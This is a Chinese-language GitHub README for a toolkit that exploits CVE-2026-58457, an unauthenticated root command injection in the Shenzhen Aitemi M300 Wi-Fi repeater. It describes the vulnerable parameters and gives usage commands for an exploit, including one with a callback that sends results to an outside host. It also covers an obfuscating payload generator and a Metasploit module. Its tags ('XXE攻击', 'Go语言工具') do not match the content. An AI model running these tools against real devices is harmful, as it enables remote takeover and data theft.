J4ck3LSyN-Gen2/CVE-2026-58457
GitHub: J4ck3LSyN-Gen2/CVE-2026-58457
针对深圳爱特米 M300 Wi-Fi 中继器未授权 OS 命令注入漏洞的完整概念验证工具集,含验证器、exploit、payload 生成器和 Metasploit 模块。
Stars: 1 | Forks: 0
# CVE-2026-58457 - 深圳爱特米 M300 Wi-Fi 中继器中的未授权 OS 命令注入
## 漏洞概述
`smacfilter_conf` handler 中存在一个**未授权**的 OS 命令注入漏洞。`name`、`enable` 和 `mac` GET 参数在未经过滤的情况下被传入 `sprintf()` 调用,该调用构建的 UCI 命令会以 **root** 权限执行。
- **严重程度**:严重 (CVSS 9.8)
- **影响**:无需身份验证即可实现远程 root 命令执行
## 包含的工具
- **`poc.py`** - 具备完整功能的 exploit,支持 HTTPS、重试、超时以及 callback 数据外发。
- **`val.py`** - 安全、被动的漏洞验证器(使用无害的 `id` 命令)。
- **`gen.py`** - 高级 payload 生成器,支持多种混淆技术。
- **`MITIGATIONS.md`** - 推荐的防御措施。
- **Metasploit 模块** - 位于 `exploit/` 目录中。
## 安装说明
```
pip install requests
```
## 快速使用
1. **验证(安全)**
```
python3 val.py --target 192.168.1.100
```
2. **Exploit(仅限授权测试)**
```
python3 poc.py --target 192.168.1.100 --cmd "id"
python3 poc.py --target 192.168.1.100 --cmd "id" --callback http://your-ip:8080/
```
3. **生成混淆 Payload**
```
python3 gen.py -c "id" -n 10
```
## Metasploit
1. **移动模块**
```
cp ./aitemi_m300_smacfilter_rce.rb ~/.msf4/modules/exploits/linux/http/
# 或者主要的 MSF 路径:/usr/share/metasploit-framework/modules/exploits/linux/http/
```
2. **重新加载所有模块**
```
msfconsole -q -x "reload_all"
```
## 参考
- _CVE-2026-58457_
- [VulnCheck 公告](https://www.vulncheck.com/advisories/shenzhen-aitemi-m300-mt02-unauthenticated-os-command-injection-via-protocol-csp)
- [GitHub 披露](https://github.com/IEATASICS/m300-repeater-bugs)
**欢迎 Star 和贡献** - 特别是针对 bypass 的改进或对其他固件变体的支持。
标签:Go语言工具, Python, XXE攻击, 无后门, 逆向工具